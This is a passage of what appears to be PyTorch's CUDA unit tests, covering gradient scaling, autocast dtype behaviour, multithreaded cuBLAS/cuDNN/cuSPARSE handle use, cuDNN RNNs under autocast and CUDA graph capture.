s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# "unskipped" times and by the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertTrue(torch.allclose(c, s, atol=atol))
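# Worked example of the expected-scale arithmetic in the assertion above, assuming
# GradScaler's default backoff_factor of 0.5: starting from init_scale=128. with
# growth_factor=2.0, three unskipped iterations and one skipped iteration give
# 128. * 2.0**3 * 0.5**1 == 512.0.
def _expected_scale_sketch(init_scale=128., growth=2.0, backoff=0.5,
                           unskipped=3, skipped=1):
    # e.g. _expected_scale_sketch() == 512.0 for the defaults above
    return init_scale * growth**unskipped * backoff**skipped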
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.cuda.amp.autocast(enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == ((128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0))
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertTrue(torch.allclose(c, s, atol=1e-7))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == ((128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0))
# Copy mod_control1 and mod_scaling1 back to device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertTrue(torch.allclose(c, s, atol=1e-7))
def test_cublas_multiple_threads_same_device(self):
# Note: these parameters should be tuned very carefully.
# Values that are too small make the race condition unlikely to occur,
# while values that are too large can sometimes cause a hang.
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
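# Small CPU-side worked example (an illustration, not part of the test) of the invariant
# the final assertion above relies on: for an all-ones n x n matrix M and all-ones weight
# W, (M @ W) / n == M, so the sum stays at n * n after any number of iterations.
def _ones_mm_invariant_sketch(n=4, iters=3):
    m = torch.ones((n, n))
    w = torch.ones((n, n))
    for _ in range(iters):
        m = (m @ w) / float(n)
    assert m.sum().item() == n * n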
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
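# Small CPU-side worked example of the bookkeeping behind the (2048 - test_iters) ** 2
# expectation above: a 2x2 all-ones kernel with no padding shrinks each spatial dim by 1
# per iteration, and dividing by 4 keeps every remaining entry equal to 1.
def _conv_shrink_sketch(n=8, iters=3):
    x = torch.ones((1, 1, n, n))
    w = torch.ones((1, 1, 2, 2))
    for _ in range(iters):
        x = torch.nn.functional.conv2d(x, w, padding=0) / 4.0
    assert x.shape[-1] == n - iters
    assert x.sum().item() == (n - iters) ** 2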
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
self.assertFalse(torch.is_autocast_enabled())
with torch.cuda.amp.autocast():
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.cuda.amp.autocast(enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.cuda.amp.autocast():
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.cuda.amp.autocast():
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.cuda.amp.autocast():
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter; we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.cuda.amp.autocast(True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.cuda.amp.autocast():
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# This test checks whether autocast re-caches the same parameters
# when executed in a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.cuda.amp.autocast():
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.cuda.amp.autocast():
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda._Graph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
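# Eager-mode sketch of the arithmetic behind the 11000.0 expectation above: the captured
# region adds 1 to each of the 1000 elements ten times, so every element of b ends up at
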